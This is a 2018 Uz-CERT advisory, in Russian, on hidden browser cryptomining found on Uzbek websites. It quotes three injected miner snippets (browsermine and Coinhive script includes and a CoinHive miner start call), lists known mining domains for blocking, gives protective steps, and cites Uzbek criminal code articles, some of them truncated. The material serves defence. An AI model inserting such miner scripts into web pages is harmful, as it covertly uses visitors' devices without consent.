UZCERTАктуально о майнинге в Узбекистане
27.02.2018 Саидакбар СадиковИнформация размещается ввиду участившегося числа обращений в адрес Uz-CERT о веб-сайтах доменной зоны "UZ", на которых запущен скрытый "браузерный майнинг"
Информация о защите персональных компьютеров
от неправомерного использования в работе глобальных вычислительных сетей по подтверждению транзакций
в блокчейне (майнинге)
Принцип «браузерного майнинга» основан на внедрении в файлы веб-сайта (веб-хостинга) javascript-сценариев или сценариев на других языках ООП, направленных на использование сетевых и иных ресурсов пользовательских рабочих станций (компьютеров, мобильных устройств и т.д.) для работы в глобальных вычислительных сетях для расчета хеш-сумм и кодов и последующих блокчейн-транзакций. Более подробная информация о браузерном майнинге доступна в глобальной сети Интернет.
Нами проведено изучение ряда веб-сайтов доменной зоны "UZ" (названия не приводятся), у которых в исходном коде страниц обнаружены доказательства размещения скриптов-майнеров:
ПРИМЕР 1
<script async="async" src="//browsermine.com/browsermine.js?u=759562&p=50"></script>ПРИМЕР 2
<script src="https://coinhive.com/lib/coinhive.min.js"></script>ПРИМЕР 3
<script>var miner = new CoinHive.Anonymous ('AOwNYbVwSP8KKOPwDsJaqVbNeAmORbsi');
miner.start ();
</script>
Ниже представлена информация о веб-сайтах, известных наличием
в файлах веб-хостинга средств для майнинга:
- azvjudwr.info
- cnhv.co
- coin-hive.com
- gus.host
- jroqvbvw.info
- jsecoin.com
- jyhfuqoh.info
- kdowqlpt.info
- listat.biz
- lmodr.biz
- mataharirama.xyz
- minecrunch.co
- minemytraffic.com
- miner.pr0gramm.com
- reasedoper.pw
- xbasfbno.info
(информация актуальная на состояние 2017 года, полный список доменных имен, использующих «майнер»-скрипты, установить не представляется возможным)
Для защиты компьютеров от угроз несанкционированного использования ресурсов в глобальных вычислительных сетях по подтверждению транзакций в блокчейне (майнинге) необходимо:
Вариант 1
Редактирование файла «hosts». Необходимо добавить домены майнинга в файл "hosts". Для наглядности, приводится пример добавления доменного имени «coin-hive.com».
- 1. Откройте проводник или другой файловый менеджер и перейдите в папку: C: \ Windows \ System32 \ drivers \ etc
- 2. Откройте файл hosts в текстовом редакторе, например «Блокнот». Добавьте строку 0.0.0.0 coin-hive.com в конец документа.
- 3. Сохраните документ.
Вариант 2
Блокировка браузерного майнинга с помощью «Anti-WebMiner»Вариант 3
Защита с помощью отключения JavaScript. Необходимо отключить выполнение «javascript»-скриптов на веб-сайтах. Это может быть проблематично, так как сайтам для правильной работы может потребоваться загрузка некоторых «javascript»-скриптов (отображение информеров, динамический контент и др.).Вариант 4
Защита от майнинга с помощью дополнений «NoCoin», «MinerBlock», «AdBlock» и «UBlock». Необходимые ссылки доступны
в глобальной сети Интернет.
Важно!!! Информация о возможности уголовного преследования за правонарушения в области информационных технологий
Уголовным кодексом Республики Узбекистан предусмотрена следующая ответственность за правонарушения в области информационных технологий
наказывается штрафом до пятидесяти минимальных размеров заработной платы или исправительными работами до одного года.
Те же действия, совершенные с причинением особо крупного ущерба, -
наказываются штрафом от пятидесяти до ста минимальных размеров заработной платы или исправительными работами от одного года до двух лет либо арестом до шести месяцев.
наказывается штрафом до ста минимальных размеров заработной платы или лишением определенного права до трех лет либо исправительными работами до одного года.
...
наказывается штрафом до ста минимальных размеров заработной платы или исправительными работами до одного года или ограничением свободы до двух лет либо лишением свободы до двух лет.
...
наказывается штрафом от трехсот до четырехсот минимальных размеров заработной платы с лишением определенного права до трех лет или ограничением свободы до двух лет либо лишением свободы до двух лет.
...
наказывается штрафом от ста до трехсот минимальных размеров заработной платы или ограничением свободы до двух лет либо лишением свободы до двух лет.
...
Статья 278-1. Нарушение правил информатизации
Нарушение правил информатизации, то есть создание, внедрение и эксплуатация информационных систем, баз и банков данных, систем обработки и передачи информации, санкционированный доступ в информационные системы без принятия установленных мер защиты, причинившее крупный ущерб либо существенный вред правам или охраняемым законом интересам граждан либо государственным или общественным интересам, -наказывается штрафом до пятидесяти минимальных размеров заработной платы или исправительными работами до одного года.
Те же действия, совершенные с причинением особо крупного ущерба, -
наказываются штрафом от пятидесяти до ста минимальных размеров заработной платы или исправительными работами от одного года до двух лет либо арестом до шести месяцев.
Статья 278-2. Незаконный (несанкционированный) доступ к компьютерной информации
Незаконный (несанкционированный) доступ к компьютерной информации, то есть информации в информационно-вычислительных системах, сетях и их составных частях, если это действие повлекло уничтожение, блокирование, модификацию, копирование либо перехват информации, нарушение работы электронно-вычислительных машин, системы электронно-вычислительных машин или их сети, -наказывается штрафом до ста минимальных размеров заработной платы или лишением определенного права до трех лет либо исправительными работами до одного года.
...
Статья 278-3. Изготовление с целью сбыта либо сбыт и распространение специальных средств для получения незаконного (несанкционированного) доступа к компьютерной системе
Изготовление с целью сбыта либо сбыт и распространение специальных программных или аппаратных средств для получения незаконного (несанкционированного) доступа к защищенной компьютерной системе -
наказывается штрафом до двухсот минимальных размеров заработной платы или исправительными работами до одного года.Статья 278-4. Модификация компьютерной информации
Модификация компьютерной информации, то есть незаконное изменение, повреждение, стирание информации, хранящейся в компьютерной системе, а равно внесение в нее заведомо ложной информации, причинившее крупный ущерб либо существенный вред правам или охраняемым законом интересам граждан либо государственным или общественным интересам, -наказывается штрафом до ста минимальных размеров заработной платы или исправительными работами до одного года или ограничением свободы до двух лет либо лишением свободы до двух лет.
...
Статья 278-5. Компьютерный саботаж
Умышленный вывод из строя чужого или служебного компьютерного оборудования, а равно разрушение компьютерной системы (компьютерный саботаж) -наказывается штрафом от трехсот до четырехсот минимальных размеров заработной платы с лишением определенного права до трех лет или ограничением свободы до двух лет либо лишением свободы до двух лет.
...
Статья 278-6. Создание, использование или распространение вредоносных программ
Создание компьютерных программ или внесение изменений в существующие программы с целью несанкционированного уничтожения, блокирования, модификации, копирования или перехвата информации, хранящейся или передаваемой в компьютерной системе, а равно разработка специальных вирусных программ, их умышленное использование или распространение -наказывается штрафом от ста до трехсот минимальных размеров заработной платы или ограничением свободы до двух лет либо лишением свободы до двух лет.
...